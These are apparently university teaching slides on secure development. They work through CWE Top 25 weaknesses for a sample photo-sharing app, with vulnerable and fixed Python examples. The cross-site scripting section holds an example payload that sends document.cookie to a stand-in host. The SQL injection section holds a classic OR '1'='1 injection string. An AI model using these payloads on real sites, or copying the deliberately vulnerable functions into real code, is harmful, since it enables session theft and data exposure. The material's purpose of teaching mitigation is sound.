Secure Software Development. Mini Zeng, University of Alabama in Huntsville


Outline
- Introduction
- Sample project: ShareAlbum
- Step by step instructions
- Errors and mitigations
- Discussion

Introduction
Common Weakness Enumeration (CWE) provides a unified, measurable set of software weaknesses. The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software.

Step by step instructions: STEP 1
Go through the CWE website and identify the potential software errors that exist in the program, using the Top 25 Most Dangerous Software Errors list as the starting point. Automated tools such as RIPS can be used to establish a raw error list. For ShareAlbum the candidates were:
- CWE-79: Cross-site Scripting
- CWE-89: SQL Injection
- CWE-862: Missing Authorization
- CWE-798: Use of Hard-coded Credentials
- CWE-311: Missing Encryption of Sensitive Data
- CWE-434: Unrestricted Upload of File with Dangerous Type
- CWE-22: Path Traversal
- CWE-759: Use of a One-Way Hash without a Salt
- CWE-327: Use of a Broken or Risky Cryptographic Algorithm

Step by Step Instructions: STEP 2
For each error, read its summary on the Top 25 page and prioritize the ones with high attacker awareness, an attack frequency of "often", and a low or medium remediation cost, so that they are fixed first.

Step by Step Instructions: Example

Step by Step Instructions: STEP 3
Check the Technical Details section of each error and select the list of errors to mitigate. Check the Applicable Platforms part to find out whether the error applies to your application. Check the code examples in the technical details; they are often helpful.
STEP 4
Decide on mitigation approaches, document the list of errors to fix, and go through all of your project code to mitigate them.

Errors and Mitigations: CWE-79
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
If you are not careful, attackers can inject JavaScript or other browser-executable script into your web page. The mitigation is to encode every untrusted value for the HTML context it is written into (text, attribute, URL or script) rather than trying to filter out "bad" input.
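Added example (not code from the ShareAlbum project or from the slides): a comment-rendering helper written the vulnerable way and the fixed way, in Python with the standard library's html module standing in for whatever template layer the project uses. The attacker comment string is constructed for the demonstration. It shows only HTML text and attribute contexts; data written into a script block or a URL needs a different encoder.

```python
import html

# Constructed sample: a comment as an attacker might submit it to ShareAlbum.
ATTACKER_COMMENT = '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'


def render_comment_vulnerable(comment: str) -> str:
    """CWE-79: the untrusted value is concatenated straight into the page."""
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    """Mitigation: HTML-entity encode the value before it lands in an HTML
    text context. quote=True also encodes ' and " so the same helper is
    safe inside a double-quoted attribute value."""
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_title_attribute_safe(title: str) -> str:
    """Untrusted data inside a double-quoted attribute (an album title echoed
    back into a form field). Encoding " as &quot; keeps the attacker from
    closing the attribute and adding an event handler."""
    return '<input name="title" value="' + html.escape(title, quote=True) + '">'


def contains_markup(rendered: str) -> bool:
    """Used by the checks below: did a tag survive into the output?"""
    return "<img" in rendered or "<script" in rendered
```

The encoded comment still displays exactly what the user typed; the browser just never parses it as a tag. Escaping at output time, once per context, is what makes the check easy to audit.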

Errors and Mitigations: CWE-89
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
If attackers can influence the SQL that you use to communicate with your database, then suddenly all your fun and profit belongs to them.
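Added example (not the project's code): the same "list a user's albums" query built by string concatenation and as a parameterized query. The albums table and its rows are constructed here, and Python's in-memory sqlite3 stands in for whatever database ShareAlbum actually uses; the point applies to any driver. It also shows the one case parameters cannot cover, a column name taken from the request, which has to be checked against an allowlist.

```python
import sqlite3

# Injection payload as an attacker would put it in the request.
INJECTION = "alice' OR '1'='1"

# Column names the "sort" parameter is allowed to select (identifiers
# cannot be bound as query parameters, so they are allowlisted instead).
SORT_COLUMNS = {"id", "title"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory ShareAlbum-style table with two users' albums."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE albums (id INTEGER PRIMARY KEY, owner TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO albums (owner, title) VALUES (?, ?)",
        [("alice", "Holiday"), ("alice", "Family"), ("bob", "Private")],
    )
    conn.commit()
    return conn


def albums_for_owner_vulnerable(conn: sqlite3.Connection, owner: str) -> list:
    """CWE-89: the request value is spliced into the SQL text, so a quote in
    it changes the statement's structure instead of being data."""
    sql = "SELECT title FROM albums WHERE owner = '" + owner + "'"
    return [row[0] for row in conn.execute(sql)]


def albums_for_owner_safe(conn: sqlite3.Connection, owner: str) -> list:
    """Mitigation: a parameterized query. The driver sends the value
    separately from the statement; it is compared as a literal string."""
    rows = conn.execute("SELECT title FROM albums WHERE owner = ?", (owner,))
    return [row[0] for row in rows]


def albums_sorted_safe(conn: sqlite3.Connection, owner: str, sort_col: str) -> list:
    """Value is parameterized; the ORDER BY identifier is allowlisted."""
    if sort_col not in SORT_COLUMNS:
        raise ValueError("unknown sort column")
    rows = conn.execute(
        f"SELECT title FROM albums WHERE owner = ? ORDER BY {sort_col}", (owner,)
    )
    return [row[0] for row in rows]
```

With the payload, the concatenated query becomes `... WHERE owner = 'alice' OR '1'='1'` and returns bob's private album too; the parameterized version looks for an owner literally named `alice' OR '1'='1` and returns nothing.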

Errors and Mitigations: CWE-862
CWE-862: Missing Authorization
Users are assigned different privileges, but the program only checks that a user is logged in (authentication) and never checks that this particular user is permitted to perform the requested action on the requested object (authorization).
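Added example (not the project's code) of the distinction in a delete-album handler: the vulnerable version stops at "is someone logged in?", the fixed version also asks "may this user touch this album?". The album store, user names and the admin set are constructed for the demonstration, and the object-level ownership check is the kind of mitigation CWE-862 describes.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Album:
    id: int
    owner: str


# Constructed data: two albums owned by different users, one admin account.
ALBUMS = {1: Album(1, "alice"), 2: Album(2, "bob")}
ADMINS = {"carol"}


class Forbidden(Exception):
    pass


def delete_album_vulnerable(current_user, album_id: int, store: dict) -> bool:
    """CWE-862: authentication is checked, authorization is not. Any logged-in
    user can delete any album just by guessing its id."""
    if current_user is None:
        raise Forbidden("login required")
    store.pop(album_id)
    return True


def can_modify(current_user: str, album: Album) -> bool:
    """Authorization rule: the owner, or an admin, may change an album."""
    return current_user == album.owner or current_user in ADMINS


def delete_album_safe(current_user, album_id: int, store: dict) -> bool:
    """Mitigation: look the object up, then check the caller's right to it
    before doing anything. Missing and not-permitted get the same answer so
    the endpoint cannot be used to enumerate which ids exist."""
    if current_user is None:
        raise Forbidden("login required")
    album = store.get(album_id)
    if album is None or not can_modify(current_user, album):
        raise Forbidden("not found or not permitted")
    store.pop(album_id)
    return True
```

The check belongs in the handler for every state-changing request (delete, rename, share), not only on the page that lists the buttons; hiding a button is not authorization.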

Discussion
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal').
- CWE-434: Unrestricted Upload of File with Dangerous Type.
- CWE-311: Missing Encryption of Sensitive Data.
- CWE-798: Use of Hard-coded Credentials. Hard-coding credentials may be convenient while coding, but anyone who obtains the source obtains the credentials.
- CWE-759: Use of a One-Way Hash without a Salt.
- CWE-327: Use of a Broken or Risky Cryptographic Algorithm.
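Added example (not the project's code) of mitigations for three of the items above, as they would appear in a photo-upload and login path: CWE-22 (resolve the requested name under the upload root and refuse anything that escapes it), CWE-434 (allowlist the type by extension and magic bytes, then store under a server-chosen name) and CWE-759/CWE-327 (a per-user random salt with an iterated KDF instead of a bare MD5/SHA-1). The UPLOAD_ROOT path and the sample file headers are assumptions for the demonstration; CWE-311 and CWE-798 are not shown.

```python
import hashlib
import hmac
import os
import secrets

# Assumed location of stored uploads; adjust for the real deployment.
UPLOAD_ROOT = os.path.abspath("/var/sharealbum/uploads")

# Allowed image types and the magic bytes each must start with.
ALLOWED_IMAGE_TYPES = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n"}


def resolve_upload_path(user_supplied_name: str) -> str:
    """CWE-22: normalize the joined path and require it to stay strictly
    below UPLOAD_ROOT. Catches ../ sequences and absolute paths alike."""
    candidate = os.path.normpath(os.path.join(UPLOAD_ROOT, user_supplied_name))
    if candidate == UPLOAD_ROOT or os.path.commonpath([UPLOAD_ROOT, candidate]) != UPLOAD_ROOT:
        raise ValueError("path escapes upload directory")
    return candidate


def check_upload(filename: str, head: bytes) -> str:
    """CWE-434: accept only allowlisted image extensions whose content
    really starts with that format's signature, and never keep the
    client's filename; return a random server-side name instead."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext == "jpeg":
        ext = "jpg"
    magic = ALLOWED_IMAGE_TYPES.get(ext)
    if magic is None or not head.startswith(magic):
        raise ValueError("file type not allowed")
    return f"{secrets.token_hex(8)}.{ext}"


def hash_password(password: str, iterations: int = 600_000) -> str:
    """CWE-759/CWE-327: 16 random salt bytes per password and PBKDF2-HMAC-SHA256
    with a high iteration count, so identical passwords hash differently
    and offline guessing is slow. Salt and parameters are stored with the hash."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt/iterations and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

The magic-byte check matters because a web server configured to execute by extension will happily run `shell.php`, and a file named `photo.jpg` that is really a script still gets served back to other users; checking both the name and the content, then discarding the client's name, closes both routes. A dedicated password hash (bcrypt, scrypt or Argon2) is preferable where a library is available; PBKDF2 is used here because it ships with the standard library.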
